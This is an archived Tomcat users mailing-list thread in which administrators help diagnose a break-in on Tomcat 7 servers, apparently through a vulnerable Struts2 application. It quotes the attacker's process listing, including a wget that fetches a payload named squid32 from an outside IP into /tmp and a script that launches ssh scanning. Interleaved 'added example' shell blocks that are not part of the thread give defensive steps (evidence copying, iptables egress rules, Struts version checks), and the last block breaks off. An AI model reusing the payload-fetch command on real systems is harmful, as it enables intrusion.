 https://wiki.apache.org/tomcat/HowTo#How_do_I_obtain_a_thread_dump_of_my_running_webapp_.3F
 
   It shall show what is stacktrace in thread that launched external
  process.

 +1

 The only things that ship with Tomcat that call Process.exec() are the
 CGI servlet and SSI, both of which are disabled by default. So, either
 you have an insecure CGI/SSI configuration, your web application has a
 vulnerability, or you have deployed something like the Manager
 application and improperly-secured it.

 A classic example of such an intrusion might be that someone got a
 foothold elsewhere into your network, and the Manager web application
 is not properly secured with a password, etc.

 -chris





Re: Regarding i think an intrusion

2014-04-30 Thread Leonardo Santagostini
Hello list,

well my homework is done

Here are the links:

setenv.sh: http://pastebin.com/EN1mXDFi
catalina.sh: http://pastebin.com/1vRVLbSm
web.xml: http://pastebin.com/BqEfiXXm
server.xml: http://pastebin.com/wfzE8bYU
logging.properties: http://pastebin.com/Qurk8sLU
catalina.properties: http://pastebin.com/jkfY1ZRQ
tree + logsfiles: http://pastebin.com/j3tip4ij

Note that logfiles are not the logfiles itself but only an ls -lah (just
for you to see the log sizes)

A little more about the infrastructure I've mounted; I'll do some ASCII art.


internet --- FW --nat--Haproxy (1)--Apache(2)-- mod_jk
(3)--Haproxy(4)-- Tomcat7(5) -- haproxy(6) --Tomcat(7)


Apache(2) is serving static content so haproxy(1) at the first level does
http round robin balancing
Apache(2) connects to tomcat(5) through haproxy(4) (using L4 connection)
using mod_jk(3)
Tomcat(5) are the main app server (the ones gets intruded) who uses
tomcat(7) (solr service) using haproxy(6) using L4 connection.

Versions:

Apache: 2.2.17
mod_jk: 1.2.31
haproxy: 1.4.22
Tomcat: 7.0.53
Java: 1.6.0.41

[root@arcbaappvrt05 tomcat]# /usr/java/default/bin/java -version
java version 1.6.0_41
Java(TM) SE Runtime Environment (build 1.6.0_41-b02)
Java HotSpot(TM) 64-Bit Server VM (build 20.14-b01, mixed mode)

OS: CentOS 5.8 64 bit

[root@arcbaappvrt05 tomcat]# uname -a
Linux arcbaappvrt05.tic.yellargentina.com 2.6.18-308.el5 #1 SMP Tue Feb 21
20:06:06 EST 2012 x86_64 x86_64 x86_64 GNU/Linux
[root@arcbaappvrt05 tomcat]# cat /etc/redhat-release
CentOS release 5.8 (Final)
[root@arcbaappvrt05 tomcat]#

For now I haven't seen that the squid process was launched, so I couldn't do a
dump.

Let me know if you need more information.

BTW, pastebin links will work for one week.

Kind regards, yours




Saludos.-
Leonardo Santagostini

http://ar.linkedin.com/in/santagostini





2014-04-30 11:09 GMT-03:00 Leonardo Santagostini lsantagost...@gmail.com:

 Ok, i will do the following:

 1) thread dump of running tomcat instance
 2) Pastebin the running tomcat config

 I think at mid day will have all the info.

 Thanks all for replying me and all the responses.

 Regards, Leonardo

 Saludos.-
 Leonardo Santagostini

 http://ar.linkedin.com/in/santagostini





 2014-04-30 10:55 GMT-03:00 Christopher Schultz 
 ch...@christopherschultz.net:


 Konstantin,

 On 4/29/14, 4:54 PM, Konstantin Kolinko wrote:
  2014-04-30 0:41 GMT+04:00 Leonardo Santagostini
  lsantagost...@gmail.com:
  Hello Dan,
 
  Nop, the attacker is executing locally the following
 
  tomcat8882 1  0 Apr27 ?00:00:00 sh /tmp/4.sh
  tomcat8893  8882  0 Apr27 ?00:00:00 wget
  http://218.199.102.59/.xy/squid32 -O /tmp/squid
 
  And the launch squid who tries to connect via ssh to varoius
  places.
 
  Right now its time to leave the office, but in a few hours i will
  paste in pastebin access logs, config files, wherever you tell
  me.
 
  This is my pstree
 
  [root@arcbaappvrt05 apache-tomcat-7.0.53]# pstree init─┬─atd
  ├─java─┬─sh───wget │  └─263*[{java}]
 
  sh launched by tomcat's java?

 Yes: please verify that it's the JVM running Tomcat, and not just any
 JVM process.

  Take a thread dump:
 
 https://wiki.apache.org/tomcat/HowTo#How_do_I_obtain_a_thread_dump_of_my_running_webapp_.3F
 
   It shall show what is stacktrace in thread that launched external
  process.

 +1

 The only things that ship with Tomcat that call Process.exec() are the
 CGI servlet and SSI, both of which are disabled by default. So, either
 you have an insecure CGI/SSI configuration, your web application has a
 vulnerability, or you have deployed something like the Manager
 application and improperly-secured it.

 A classic example of such an intrusion might be that someone got a
 foothold elsewhere into your network, and the Manager web application
 is not properly secured with a password, etc.

 -chris


Re: Regarding i think an intrusion

2014-04-30 Thread Christopher Schultz

Leonardo,

You need to post a thread dump as well.

-chris

On 4/30/14, 11:35 AM, Leonardo Santagostini wrote:
 Hello list,
 
 well my homework is done
 
 Here are the links:
 
 setenv.sh: http://pastebin.com/EN1mXDFi catalina.sh: 
 http://pastebin.com/1vRVLbSm web.xml: http://pastebin.com/BqEfiXXm
  server.xml: http://pastebin.com/wfzE8bYU logging.properties: 
 http://pastebin.com/Qurk8sLU catalina.properties: 
 http://pastebin.com/jkfY1ZRQ tree + logsfiles: 
 http://pastebin.com/j3tip4ij
 
 Note that logsfiles, are not the logfiles itsef but only a ls -lah 
 (just for you to see the logsizes)
 
 A little more about the infraestructure i've mounted ill do some 
 ascii art.
 
 
 internet --- FW --nat--Haproxy (1)--Apache(2)-- mod_jk 
 (3)--Haproxy(4)-- Tomcat7(5) -- haproxy(6) --Tomcat(7)
 
 
 Apache(2) is serving static content so haproxy(1) at the first 
 level does http round robin balancing Apache(2) connects to 
 tomcat(5) through haproxy(4) (using L4 connection) using mod_jk(3)
  Tomcat(5) are the main app server (the ones gets intruded) who 
 uses tomcat(7) (solr service) using haproxy(6) using L4 
 connection.
 
 Versions:
 
 Apache: 2.2.17 mod_jk: 1.2.31 haproxy: 1.4.22 Tomcat: 7.0.53 Java: 
 1.6.0.41
 
 [root@arcbaappvrt05 tomcat]# /usr/java/default/bin/java -version 
 java version 1.6.0_41 Java(TM) SE Runtime Environment (build 
 1.6.0_41-b02) Java HotSpot(TM) 64-Bit Server VM (build 20.14-b01, 
 mixed mode)
 
 OS: CentOS 5.8 64 bit
 
 [root@arcbaappvrt05 tomcat]# uname -a Linux 
 arcbaappvrt05.tic.yellargentina.com 2.6.18-308.el5 #1 SMP Tue Feb 
 21 20:06:06 EST 2012 x86_64 x86_64 x86_64 GNU/Linux 
 [root@arcbaappvrt05 tomcat]# cat /etc/redhat-release CentOS
 release 5.8 (Final) [root@arcbaappvrt05 tomcat]#
 
 For now i havent see that the squid process whas launched so i 
 couldnt do a dump
 
 Letme know if you need more information.
 
 BTW, pastebin links will work for one week.
 
 Kind regards, yours
 
 
 
 
 Saludos.- Leonardo Santagostini
 
 http://ar.linkedin.com/in/santagostini
 
 
 
 
 
 2014-04-30 11:09 GMT-03:00 Leonardo Santagostini 
 lsantagost...@gmail.com:
 
 Ok, i will do the following:
 
 1) thread dump of running tomcat instance 2) Pastebin the
 running tomcat config
 
 I think at mid day will have all the info.
 
 Thanks all for replying me and all the responses.
 
 Regards, Leonardo
 
 Saludos.- Leonardo Santagostini
 
 http://ar.linkedin.com/in/santagostini
 
 
 
 
 
 2014-04-30 10:55 GMT-03:00 Christopher Schultz  
 ch...@christopherschultz.net:
 
 
 Konstantin,
 
 On 4/29/14, 4:54 PM, Konstantin Kolinko wrote:
 2014-04-30 0:41 GMT+04:00 Leonardo Santagostini 
 lsantagost...@gmail.com:
 Hello Dan,
 
 Nop, the attacker is executing locally the following
 
 tomcat8882 1  0 Apr27 ?00:00:00 sh 
 /tmp/4.sh tomcat8893  8882  0 Apr27 ?00:00:00 
 wget http://218.199.102.59/.xy/squid32 -O /tmp/squid
 
 And the launch squid who tries to connect via ssh to 
 varoius places.
 
 Right now its time to leave the office, but in a few hours 
 i will paste in pastebin access logs, config files, 
 wherever you tell me.
 
 This is my pstree
 
 [root@arcbaappvrt05 apache-tomcat-7.0.53]# pstree 
 init─┬─atd ├─java─┬─sh───wget │  └─263*[{java}]
 
 sh launched by tomcat's java?
 
 Yes: please verify that it's the JVM running Tomcat, and not 
 just any JVM process.
 
 Take a thread dump:
 
 https://wiki.apache.org/tomcat/HowTo#How_do_I_obtain_a_thread_dump_of_my_running_webapp_.3F
 
 It shall show what is stacktrace in thread that launched external
 process.
 
 +1
 
 The only things that ship with Tomcat that call Process.exec() 
 are the CGI servlet and SSI, both of which are disabled by 
 default. So, either you have an insecure CGI/SSI
 configuration, your web application has a vulnerability, or you
 have deployed something like the Manager application and
 improperly-secured it.
 
 A classic example of such an intrusion might be that someone 
 got a foothold elsewhere into your network, and the Manager
 web application is not properly secured with a password, etc.
 
 -chris

RE: Regarding i think an intrusion

2014-04-30 Thread Martin Gainty

 Date: Wed, 30 Apr 2014 12:35:52 -0300
 Subject: Re: Regarding i think an intrusion
 From: lsantagost...@gmail.com
 To: users@tomcat.apache.org
 
 Hello list,
 
 well my homework is done
 
 Here are the links:
 
 setenv.sh: http://pastebin.com/EN1mXDFi
 catalina.sh: http://pastebin.com/1vRVLbSm
 web.xml: http://pastebin.com/BqEfiXXm
 server.xml: http://pastebin.com/wfzE8bYU
 logging.properties: http://pastebin.com/Qurk8sLU
 catalina.properties: http://pastebin.com/jkfY1ZRQ
 tree + logsfiles: http://pastebin.com/j3tip4ij

MG> Please paste the contents of the following log files into Pastebin and send us the link:

-rw-rw-r-- 1 tomcat tomcat  5.0K Apr 30 05:38 localhost.2014-04-30.log
-rw-rw-r-- 1 tomcat tomcat  5.4M Apr 30 12:19 localhost_access_log.2014-04-30.txt
-rw-rw-r-- 1 tomcat tomcat     0 Apr 30 05:38 manager.2014-04-30.log
-rw-rw-r-- 1 tomcat tomcat  3.7M Apr 30 12:19 PDI_access_log.2014-04-30.txt
-rw-rw-r-- 1 tomcat tomcat   43M Apr 30 12:18 portal-ht.log
-rw-rw-r-- 1 tomcat tomcat  583K Apr 30 10:09 portal-mh.log
-rw-rw-r-- 1 tomcat tomcat   58M Apr 30 12:19 portal-pdi.log
-rw-rw-r-- 1 tomcat tomcat  3.5M Apr 30 12:18 portal-rt.log
-rw-rw-r-- 1 tomcat tomcat  3.6M Apr 30 12:18 probe.log
-rw-rw-r-- 1 tomcat tomcat  591K Apr 30 12:18 RT_access_log.2014-04-30.txt

MG> Kind regards from the USA

 
 Note that logsfiles, are not the logfiles itsef but only a ls -lah (just
 for you to see the logsizes)
 
 A little more about the infraestructure i've mounted ill do some ascii art.
 
 
 internet --- FW --nat--Haproxy (1)--Apache(2)-- mod_jk
 (3)--Haproxy(4)-- Tomcat7(5) -- haproxy(6) --Tomcat(7)
 
 
 Apache(2) is serving static content so haproxy(1) at the first level does
 http round robin balancing
 Apache(2) connects to tomcat(5) through haproxy(4) (using L4 connection)
 using mod_jk(3)
 Tomcat(5) are the main app server (the ones gets intruded) who uses
 tomcat(7) (solr service) using haproxy(6) using L4 connection.
 
 Versions:
 
 Apache: 2.2.17
 mod_jk: 1.2.31
 haproxy: 1.4.22
 Tomcat: 7.0.53
 Java: 1.6.0.41
 
 [root@arcbaappvrt05 tomcat]# /usr/java/default/bin/java -version
 java version 1.6.0_41
 Java(TM) SE Runtime Environment (build 1.6.0_41-b02)
 Java HotSpot(TM) 64-Bit Server VM (build 20.14-b01, mixed mode)
 
 OS: CentOS 5.8 64 bit
 
 [root@arcbaappvrt05 tomcat]# uname -a
 Linux arcbaappvrt05.tic.yellargentina.com 2.6.18-308.el5 #1 SMP Tue Feb 21
 20:06:06 EST 2012 x86_64 x86_64 x86_64 GNU/Linux
 [root@arcbaappvrt05 tomcat]# cat /etc/redhat-release
 CentOS release 5.8 (Final)
 [root@arcbaappvrt05 tomcat]#
 
 For now i havent see that the squid process whas launched so i couldnt do a
 dump
 
 Letme know if you need more information.
 
 BTW, pastebin links will work for one week.
 
 Kind regards, yours
 
 
 
 
 Saludos.-
 Leonardo Santagostini
 
 http://ar.linkedin.com/in/santagostini
 
 
 
 
 
 2014-04-30 11:09 GMT-03:00 Leonardo Santagostini lsantagost...@gmail.com:
 
  Ok, i will do the following:
 
  1) thread dump of running tomcat instance
  2) Pastebin the running tomcat config
 
  I think at mid day will have all the info.
 
  Thanks all for replying me and all the responses.
 
  Regards, Leonardo
 
  Saludos.-
  Leonardo Santagostini
 
  http://ar.linkedin.com/in/santagostini
 
 
 
 
 
  2014-04-30 10:55 GMT-03:00 Christopher Schultz 
  ch...@christopherschultz.net:
 
 
  Konstantin,
 
  On 4/29/14, 4:54 PM, Konstantin Kolinko wrote:
   2014-04-30 0:41 GMT+04:00 Leonardo Santagostini
   lsantagost...@gmail.com:
   Hello Dan,
  
   Nop, the attacker is executing locally the following
  
   tomcat8882 1  0 Apr27 ?00:00:00 sh /tmp/4.sh
   tomcat8893  8882  0 Apr27 ?00:00:00 wget
   http://218.199.102.59/.xy/squid32 -O /tmp/squid
  
   And the launch squid who tries to connect via ssh to varoius
   places.
  
   Right now its time to leave the office, but in a few hours i will
   paste in pastebin access logs, config files, wherever you tell
   me.
  
   This is my pstree
  
   [root@arcbaappvrt05 apache-tomcat-7.0.53]# pstree init─┬─atd
   ├─java─┬─sh───wget │  └─263*[{java}]
  
   sh launched by tomcat's java?
 
  Yes: please verify that it's the JVM running Tomcat, and not just any
  JVM process.
 
   Take a thread dump:
  
  https://wiki.apache.org/tomcat/HowTo#How_do_I_obtain_a_thread_dump_of_my_running_webapp_.3F
  
It shall show what is stacktrace in thread that launched external
   process.
 
  +1
 
  The only things that ship with Tomcat that call Process.exec() are the
  CGI servlet and SSI, both of which are disabled by default. So, either
  you have an insecure CGI/SSI configuration, your web application has a
  vulnerability, or you have deployed something like the Manager
  application and improperly-secured it.
 
  A classic example of such an intrusion might be that someone got a
  foothold elsewhere into your network, and the Manager web application
  is not properly

Re: Regarding i think an intrusion

2014-04-30 Thread Felix Schumacher


On 30. April 2014 17:35:52 MESZ, Leonardo Santagostini 
lsantagost...@gmail.com wrote:
Hello list,

well my homework is done

Here are the links:

setenv.sh: http://pastebin.com/EN1mXDFi
catalina.sh: http://pastebin.com/1vRVLbSm
web.xml: http://pastebin.com/BqEfiXXm
server.xml: http://pastebin.com/wfzE8bYU
logging.properties: http://pastebin.com/Qurk8sLU
catalina.properties: http://pastebin.com/jkfY1ZRQ
tree + logsfiles: http://pastebin.com/j3tip4ij

From the logfiles it looks like you have struts2 applications. It might be 
that you are hit by a security problem within struts2 ( Konstantin forwarded a 
warning a few days ago 
http://tomcat.10.x6.nabble.com/Fwd-ANN-Struts-2-up-to-2-3-16-1-Zero-Day-Exploit-Mitigation-security-critical-td5016578.html
 ).


Note that logsfiles, are not the logfiles itsef but only a ls -lah
(just
for you to see the logsizes)

A little more about the infraestructure i've mounted ill do some ascii
art.


internet --- FW --nat--Haproxy (1)--Apache(2)-- mod_jk
(3)--Haproxy(4)-- Tomcat7(5) -- haproxy(6) --Tomcat(7)

That seems a bit too complex. In my eyes you need no haproxy between httpd and 
tomcat when you use mod_jk.

Regards
 Felix


Apache(2) is serving static content, so haproxy(1) at the first level
does HTTP round-robin balancing.
Apache(2) connects to Tomcat(5) through haproxy(4) (using an L4
connection) via mod_jk(3).
Tomcat(5) are the main app servers (the ones that get intruded), which use
Tomcat(7) (the Solr service) through haproxy(6), also over an L4 connection.

Versions:

Apache: 2.2.17
mod_jk: 1.2.31
haproxy: 1.4.22
Tomcat: 7.0.53
Java: 1.6.0_41

[root@arcbaappvrt05 tomcat]# /usr/java/default/bin/java -version
java version 1.6.0_41
Java(TM) SE Runtime Environment (build 1.6.0_41-b02)
Java HotSpot(TM) 64-Bit Server VM (build 20.14-b01, mixed mode)

OS: CentOS 5.8 64 bit

[root@arcbaappvrt05 tomcat]# uname -a
Linux arcbaappvrt05.tic.yellargentina.com 2.6.18-308.el5 #1 SMP Tue Feb 21 20:06:06 EST 2012 x86_64 x86_64 x86_64 GNU/Linux
[root@arcbaappvrt05 tomcat]# cat /etc/redhat-release
CentOS release 5.8 (Final)
[root@arcbaappvrt05 tomcat]#

For now I haven't seen the squid process being launched, so I couldn't
do a dump.

Let me know if you need more information.

BTW, pastebin links will work for one week.

Kind regards, yours




Saludos.-
Leonardo Santagostini

http://ar.linkedin.com/in/santagostini





2014-04-30 11:09 GMT-03:00 Leonardo Santagostini
lsantagost...@gmail.com:

 OK, I will do the following:

 1) thread dump of the running Tomcat instance
 2) pastebin the running Tomcat config

 I think by midday I will have all the info.

 Thanks, all, for replying to me, and for all the responses.

 Regards, Leonardo

 Saludos.-
 Leonardo Santagostini

 http://ar.linkedin.com/in/santagostini





 2014-04-30 10:55 GMT-03:00 Christopher Schultz 
 ch...@christopherschultz.net:

 -BEGIN PGP SIGNED MESSAGE-
 Hash: SHA256

 Konstantin,

 On 4/29/14, 4:54 PM, Konstantin Kolinko wrote:
  2014-04-30 0:41 GMT+04:00 Leonardo Santagostini
  lsantagost...@gmail.com:
  Hello Dan,
 
   Nope, the attacker is executing the following locally:
 
   tomcat    8882     1  0 Apr27 ?        00:00:00 sh /tmp/4.sh
   tomcat    8893  8882  0 Apr27 ?        00:00:00 wget http://218.199.102.59/.xy/squid32 -O /tmp/squid
 
   And then it launches squid, which tries to connect via ssh to various
   places.
 
   Right now it's time to leave the office, but in a few hours I will
   paste on pastebin the access logs, config files, whatever you tell
   me.
 
  This is my pstree
 
   [root@arcbaappvrt05 apache-tomcat-7.0.53]# pstree
   init─┬─atd
        ├─java─┬─sh───wget
        │      └─263*[{java}]
 
  sh launched by tomcat's java?

  Yes: please verify that it's the JVM running Tomcat, and not just any
  JVM process.

  Take a thread dump:
 

https://wiki.apache.org/tomcat/HowTo#How_do_I_obtain_a_thread_dump_of_my_running_webapp_.3F
 
   It shall show the stack trace of the thread that launched the external
   process.

 +1

  The only things that ship with Tomcat that call Process.exec() are the
  CGI servlet and SSI, both of which are disabled by default. So, either
  you have an insecure CGI/SSI configuration, your web application has a
  vulnerability, or you have deployed something like the Manager
  application and improperly secured it.

  A classic example of such an intrusion might be that someone got a
  foothold elsewhere into your network, and the Manager web application
  is not properly secured with a password, etc.

 - -chris

Re: Regarding i think an intrusion

2014-04-30 Thread Leonardo Santagostini
Hello Martin/Felix,

I'm uploading my logfiles, so they will be available when the upload finishes.

Regarding the configuration, it's working on two other sites without
problems, and there is no problem with putting L4 balancing with haproxy in there.

I have asked the developers about that exploit, still without an answer.

I will let you know how things are going. Thanks for everything =)

Regards/Saludos!

BTW: Martin, thanks for your Spanish words. Really appreciated =)

Saludos.-
Leonardo Santagostini

http://ar.linkedin.com/in/santagostini





2014-04-30 13:20 GMT-03:00 Felix Schumacher 
felix.schumac...@internetallee.de:




Re: Regarding i think an intrusion

2014-04-30 Thread Christopher Schultz
-BEGIN PGP SIGNED MESSAGE-
Hash: SHA256

Leonardo,

On 4/30/14, 12:48 PM, Leonardo Santagostini wrote:
 Im uploading mi logfiles so it will be available when finished
 uploading.

Remember to get a thread dump while Runtime.exec() is running.

You should copy the script /tmp/4.sh somewhere else so you have a copy
in case the attacker tries to clean up after themselves. That's
certainly what's doing the evil work.

You could probably set up iptables or something to restrict outgoing
requests so that the attack can't progress across your network.

 Regarding the configuration, its working in two other sites
 without problem, and there is no problem putting L4 balancing with
 haproxy.
 
 I have asked developers about that exploit, still without answer.

You appear to be using struts2 2.1.8, which is in the range of
versions vulnerable to this bug. There is a workaround that you can
probably apply:
http://struts.apache.org/release/2.3.x/docs/s2-021.html (see the last
section on this page).

Of course, the vulnerability doesn't allow you to simply inject code
or anything like that: you can certainly mess-around with code that is
already available on the site, though.

- -chris
-BEGIN PGP SIGNATURE-
Version: GnuPG v1
Comment: GPGTools - http://gpgtools.org
Comment: Using GnuPG with Thunderbird - http://www.enigmail.net/

iQIcBAEBCAAGBQJTYS3BAAoJEBzwKT+lPKRYqDsP/jmNjM+YwxySFGgPUuvcL2bN
kkApblcr9ryGZQG6RGwUFr69FCJ8qFDQSZ0aXXxPCfTpM6ce1VqXPv+WcOwnueOF
mrugSa2InF2IWPAP2lwhEGqyxRAYZGfxz0aA9sFb7sSw4IpDP7u6TJx9g3oYrLTt
URIbzTfhY0aGgEkQlrWNgrAWFKsUQ0uOrg8+3IS52O/e1ZVdudTMQBh5/LLJ522p
yr+TlMooKDY8OA1TYttE0zEe3/Z9dd2AZ4YHoqLy8Hwq0lufYSaFZ5TpHfiOgJ0I
0Q3dcXEmjMTrBkBm4JKBR9b6KZSvG/H42q0GsEFHZeGw+3VIqYFGVRR5iCRRvVgg
cqVKgGevB+fefcbGX9IFgFnus8QMUYq4XOcsE1YJVflxVBEfgwsCDLZEJqpzbovV
ZpNBimPoLc8I5ifo2o7GSkO1GNSjhD7Q9p5MnmNW7Qna9RJh67Lv2oft9yPqGvjZ
F2dTgbKFqyr8GSy/X4Ji8FsoeK+YxF0zXXDkaXxJzu054LuhodLCHJu7WwnwGjjL
0VI/Xxfihzk9+u3HNuwK0HTEt40Tca+vEKDUlMa9fvHL3ZqM3upy50bGE0PCTrJO
A1cI+e0lzKEEQ+maym65DmSYiVvUPnfv0AxA0iUfU/UbhV1yWEkD3TyF3dOZPZqH
ob6Km1Clt4KNLKVyQjt+
=8KFm
-END PGP SIGNATURE-

-
To unsubscribe, e-mail: users-unsubscr...@tomcat.apache.org
For additional commands, e-mail: users-h...@tomcat.apache.org
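The containment steps Chris lists in this message, as an added example that is not code from the thread, from Tomcat or from Struts: copying /tmp/4.sh and /tmp/squid out of the way with a checksum before they disappear, host egress rules so that anything running as the tomcat user can only reach what the application needs, and an inventory of which deployed webapps still carry a struts2-core older than 2.3.16.2, the release that fixes S2-021. The Unix user tomcat, the Solr load balancer at 10.0.0.6:8983 and the resolver at 10.0.0.53 are assumptions of mine; the addresses are made up.

```shell
#!/bin/sh
# Added example, not from the thread: the containment steps suggested on the
# list, done in a repeatable way. Assumptions (not stated on the page):
# Tomcat runs as the Unix user "tomcat"; the haproxy in front of Solr is
# 10.0.0.6:8983 and the resolver 10.0.0.53 (made-up addresses).
TOMCAT_USER=${TOMCAT_USER:-tomcat}
SOLR_LB=${SOLR_LB:-10.0.0.6}
SOLR_PORT=${SOLR_PORT:-8983}
DNS=${DNS:-10.0.0.53}

# 1. Preserve the dropped files before the attacker (or a reboot clearing
#    /tmp) removes them: copy with timestamps intact, record owner/size/mtime
#    and a checksum, then make the evidence directory read-only.
#    Usage: preserve_evidence /root/ir/$(date +%Y%m%d) /tmp/4.sh /tmp/squid
preserve_evidence() {
    dest=$1; shift
    mkdir -p "$dest" || return 1
    for f in "$@"; do
        [ -e "$f" ] || { echo "missing: $f" >&2; continue; }
        cp -p "$f" "$dest/" || return 1
        ls -ln "$f" >> "$dest/MANIFEST"
        ( cd "$dest" && sha1sum "$(basename "$f")" >> SHA1SUMS )
    done
    chmod -R a-w "$dest"
}

# 2. Egress policy for the tomcat user. Replies on connections the JVM already
#    has (the AJP traffic from mod_jk) stay ESTABLISHED and pass; Solr and DNS
#    are allowed explicitly; every other NEW connection, such as the wget of
#    the payload or the ssh scanning by /tmp/squid, is logged and refused.
#    The rules are printed, not applied; see apply_tomcat_egress below.
tomcat_egress_rules() {
    cat <<EOF
iptables -N TOMCAT_OUT
iptables -A TOMCAT_OUT -o lo -j ACCEPT
iptables -A TOMCAT_OUT -m state --state ESTABLISHED,RELATED -j ACCEPT
iptables -A TOMCAT_OUT -p tcp -d $SOLR_LB --dport $SOLR_PORT -j ACCEPT
iptables -A TOMCAT_OUT -p udp -d $DNS --dport 53 -j ACCEPT
iptables -A TOMCAT_OUT -m limit --limit 10/min -j LOG --log-prefix "tomcat-egress: "
iptables -A TOMCAT_OUT -j REJECT --reject-with icmp-admin-prohibited
iptables -I OUTPUT 1 -m owner --uid-owner $TOMCAT_USER -j TOMCAT_OUT
EOF
}
# Run as root on the host once the destinations above are verified.
apply_tomcat_egress() { tomcat_egress_rules | sh -e; }

# True when dotted version $1 sorts before $2 (CentOS 5 has no sort -V).
version_lt() {
    awk -v a="$1" -v b="$2" 'BEGIN {
        na = split(a, x, "."); nb = split(b, y, ".")
        n = na > nb ? na : nb
        for (i = 1; i <= n; i++) {
            if (x[i] + 0 < y[i] + 0) exit 0
            if (x[i] + 0 > y[i] + 0) exit 1
        }
        exit 1 }'
}

# 3. Which webapps still ship a Struts 2 older than 2.3.16.2 (the S2-021 fix).
#    Usage: struts_inventory $CATALINA_BASE/webapps
struts_inventory() {
    find "$1" -name 'struts2-core-*.jar' 2>/dev/null | while read -r jar; do
        v=$(basename "$jar" .jar); v=${v#struts2-core-}
        if version_lt "$v" 2.3.16.2; then
            echo "VULNERABLE $v $jar"
        else
            echo "ok $v $jar"
        fi
    done
}
```

Apply the rules on one of the six servers first and watch the tomcat-egress: log lines for a while: every legitimate destination the application has (a database, a mail relay, the Solr haproxy on its real port) shows up there and needs its own ACCEPT before the set goes on the other hosts. With only the rules above, a NEW connection from the JVM to the payload host or to any ssh port is refused while the AJP connections from mod_jk keep working. This limits what a compromised JVM can do as the tomcat user while the Struts upgrade is pending; it is not a fix, and it does nothing once an attacker has root.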



Re: Regarding i think an intrusion

2014-04-30 Thread Leonardo Santagostini
Hello Christopher, thanks for your response.

I have a copy of 4.sh and squid (a binary ELF file) and tried to see, using
strings, what this program does. I couldn't see anything =(

I'm monitoring the server to get a dump at the moment this injection
occurs.

Files still uploading =(

Thanks for all, kind regards


Saludos.-
Leonardo Santagostini

http://ar.linkedin.com/in/santagostini





2014-04-30 14:07 GMT-03:00 Christopher Schultz ch...@christopherschultz.net
:





Regarding i think an intrusion

2014-04-29 Thread Leonardo Santagostini
Hello list,

I'm facing an issue with 6 Tomcat servers that are getting penetrated, and they
are executing malicious scripts on my server.

I'm using 7.0.53 on my servers, running CentOS 5.8.

Let me know what information you need.

PS: This is my first mail to this list, so I apologize for this not-so-gentle
presentation.

Saludos.-
Leonardo Santagostini

http://ar.linkedin.com/in/santagostini


Re: Regarding i think an intrusion

2014-04-29 Thread JB MORLA
Hi,

I am learning to set up a server and I found this article about security

http://mon-serveur.anael.eu/doku.php/securite/firewall_iptables




On Tue, Apr 29, 2014 at 9:08 PM, Leonardo Santagostini 
lsantagost...@gmail.com wrote:




Re: Regarding i think an intrusion

2014-04-29 Thread Daniel Mikusa
On Apr 29, 2014, at 12:08 PM, Leonardo Santagostini lsantagost...@gmail.com 
wrote:

 Hello list,
 
 I'm facing an issue with 6 Tomcat servers that are getting penetrated, and they
 are executing malicious scripts on my server.

Can you share more about what they are doing?  It might give some clues as to 
how they are accessing your machines.  For example, if they are deploying a WAR 
file to your server, it could mean that they have access to the Manager 
application on your server.  

Any details you can share, might be helpful.

 I'm using 7.0.53 on my servers, running CentOS 5.8.
 
 Let me know what information you need.

Do you have an access log?  If not, enable one.  If the attacker is not 
deleting it, it could show you more about who they are and what requests they 
are executing to access your server.  Assuming they are entering through your 
application and not some other way.

Dan

 
 PS: This is my first mail to this list, so I apologize for this not-so-gentle
 presentation.
 
 Saludos.-
 Leonardo Santagostini
 
 http://ar.linkedin.com/in/santagostini





Re: Regarding i think an intrusion

2014-04-29 Thread Leonardo Santagostini
Hello Dan,

Nope, the attacker is executing the following locally:

tomcat    8882     1  0 Apr27 ?        00:00:00 sh /tmp/4.sh
tomcat    8893  8882  0 Apr27 ?        00:00:00 wget http://218.199.102.59/.xy/squid32 -O /tmp/squid

And then it launches squid, which tries to connect via ssh to various places.

Right now it's time to leave the office, but in a few hours I will paste on
pastebin the access logs, config files, whatever you tell me.

This is my pstree

[root@arcbaappvrt05 apache-tomcat-7.0.53]# pstree
init─┬─atd
 ├─atop
 ├─crond
 ├─dbus-daemon
 ├─events/0
 ├─events/1
 ├─events/2
 ├─events/3
 ├─httpd───8*[httpd]
 ├─irqbalance
 ├─2*[iscsid]
 ├─iscsiuio───3*[{iscsiuio}]
 ├─java─┬─sh───wget
 │  └─263*[{java}]
 ├─khelper

By the way, the logfiles are really big, 200 MB each; I'll try to set up a
Dropbox account so I can share them.

Thanks and regards

Saludos.-
Leonardo Santagostini

http://ar.linkedin.com/in/santagostini





2014-04-29 17:34 GMT-03:00 Daniel Mikusa dmik...@gopivotal.com:





Re: Regarding i think an intrusion

2014-04-29 Thread Leonardo Santagostini
Sorry, but I forgot to post:

/usr/java/default/bin/java -version
java version 1.6.0_41
Java(TM) SE Runtime Environment (build 1.6.0_41-b02)
Java HotSpot(TM) 64-Bit Server VM (build 20.14-b01, mixed mode)


Saludos.-
Leonardo Santagostini

http://ar.linkedin.com/in/santagostini





2014-04-29 17:41 GMT-03:00 Leonardo Santagostini lsantagost...@gmail.com:






Re: Regarding i think an intrusion

2014-04-29 Thread Konstantin Kolinko
2014-04-30 0:41 GMT+04:00 Leonardo Santagostini lsantagost...@gmail.com:
 Hello Dan,

 Nope, the attacker is executing the following locally:

 tomcat    8882     1  0 Apr27 ?        00:00:00 sh /tmp/4.sh
 tomcat    8893  8882  0 Apr27 ?        00:00:00 wget http://218.199.102.59/.xy/squid32 -O /tmp/squid

 And then it launches squid, which tries to connect via ssh to various places.

 Right now it's time to leave the office, but in a few hours I will paste on
 pastebin the access logs, config files, whatever you tell me.

 This is my pstree

 [root@arcbaappvrt05 apache-tomcat-7.0.53]# pstree
 init─┬─atd
  ├─java─┬─sh───wget
  │  └─263*[{java}]

sh launched by tomcat's java?

Take a thread dump:
https://wiki.apache.org/tomcat/HowTo#How_do_I_obtain_a_thread_dump_of_my_running_webapp_.3F

It shall show the stack trace of the thread that launched the external process.

Best regards,
Konstantin Kolinko

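What to do with that dump, as an added example that is not code from the thread or from Tomcat; the same triage serves Chris's "get a thread dump while Runtime.exec() is running" earlier on the page and Konstantin's "take a thread dump" here. The dump text inside the block is a constructed sample in HotSpot's format, not a dump from the affected servers; the application frame com.example.webapp.ReportAction, the Unix user tomcat and the stock Bootstrap class name on the command line are assumptions of mine.

```shell
#!/bin/sh
# Added example, not code from the thread or from Tomcat: taking the thread
# dump asked for on the list, and reading it. The dump below is a constructed
# sample in HotSpot's format, not one from the affected host;
# com.example.webapp.ReportAction is a made-up application frame.

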